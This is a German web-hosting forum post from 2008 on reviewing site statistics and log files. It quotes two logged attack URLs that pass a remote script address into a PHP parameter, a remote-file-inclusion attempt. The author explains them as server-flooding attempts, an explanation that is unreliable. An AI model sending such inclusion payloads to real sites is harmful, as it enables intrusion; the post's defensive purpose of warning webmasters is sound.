1awww.com - Forum
Oktober 12, 2008, 12:49:34 am *
Willkommen Gast. Bitte einloggen oder registrieren.

Einloggen mit Benutzername, Passwort und Sitzungslänge
News: SMF - Just Installed!
 
   Übersicht   Hilfe Suche Einloggen Registrieren  
1awww.com - Forum > 1awww > Sicherheit für Webspaces > Statistiken und Log-Files im eigenen Sinne prüfen
Seiten: [1]
« vorheriges nächstes »
  Drucken  
Autor Thema: Statistiken und Log-Files im eigenen Sinne prüfen  (Gelesen 33 mal)
admin
1awww.com ISP
Administrator
Newbie
*****
Offline Offline

Beiträge: 13


Profil anzeigen WWW
« am: Januar 07, 2008, 10:10:19 pm »
Viele Webspacebesitzer haben bereits diverse Statistik-Programme und können auch die Log-Files einsehen. Dies sollten sie auch in jedem Fall immer regelmäßiger tun. Nicht nur, daß man als Webmaster, schöne Statistiken angezeigt bekommt, verraten diese einem auch, wer und wie manche Nutzer auf die Seiten zugreifen. Der positive und auch negative Erfolg, ist oft nur durch Werbung abhängig, aber auch durch Angriffe Dritter.

Bei zu hohen Unregelmäßigkeiten, sollte auch der Seitenanbieter Alarm schlagen und Hilfe in Anspruch nehmen, um Ausfälle auch für sich selbst zu reduzieren, alleine schon, um z.B. bei Nutzung von generierten Sitemaps nicht fehlerhafte Sitemaps an die Suchmaschinen zu liefern, was ggf. zum Negativ-Erfolg führen kann.

So erscheinen z.B. bei uns folgende Log-Einträge:

Code:
http://www.1awww.com/207-0-webspace-tarif-cp-a.html//ws/get_reminders.php?includedir=http://strangeattitude.com//backend/geeklog.txt?

http://www.1awww.com/207-0-webspace-tarif-us-a.html?gclid=CK7O6P6H4I8CFRhZXgodvDjUhQ//index.php?id=http://www.midsouthhomebuyersweb.com//modules/Forums/main.txt?</
</

Wer dann denkt, na, daß kommt vielleicht vom Referer, der hat sich getäuscht. Nein, hier werden offensichtlich versucht, insbesondere aus dem asiatischen Raum, Adressketten aufzubauen, die zur Überlastung / Überflutung der Server-Verarbeitung führen sollen, denn hier endet der Aufruf der Url bereits direkt hinter
Code:
http://www.1awww.com/207-0-webspace-tarif-cp-a.html
und nicht, wie protokolliert mit einem langen Anhang. Webspace-Betreiber und Server-Betreiber können solche Probleme nicht komplett auffangen, allerdings kann man weitgehenst Filter programmieren, die solche Attacken frühzeitig abfangen - wie gesagt, es nicht nicht möglich, sie gänzlich abzufangen!

Inzwischen gehen manche Server-Betreiber konsequent daran und sperren (TCP)-IP-Bereiche von einzelnen Angreifern, bis zu kompletten Segmenten oder sogar kompletten Staaten, weil diese Angriffe kontinental erfolgen, aber auch aus Servern manchen Universitäten aus Deutschland (oder deren User) erfolgen diese Angriffe!

Zwar können Verursacher immer ausfindig gemacht werden, leider sind oft erst Strafanzeigen nötig, um dann auch die Verursacher mit Anschrift haftbar machen zu können.

Grüße

Detlef
« Letzte Änderung: Januar 07, 2008, 10:16:26 pm von admin » Gespeichert
Grüße

Detlef
auch interessant Final-Sell, für eBay-Verkäufer
http://www.final-sell.com
Admin von http://www.1awww.com
Seiten: [1]
  Drucken  
« vorheriges nächstes »
 
Gehe zu:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.4 | SMF © 2006, Simple Machines LLC Prüfe XHTML 1.0 Prüfe CSS
Seite erstellt in 0.342 Sekunden mit 16 Zugriffen.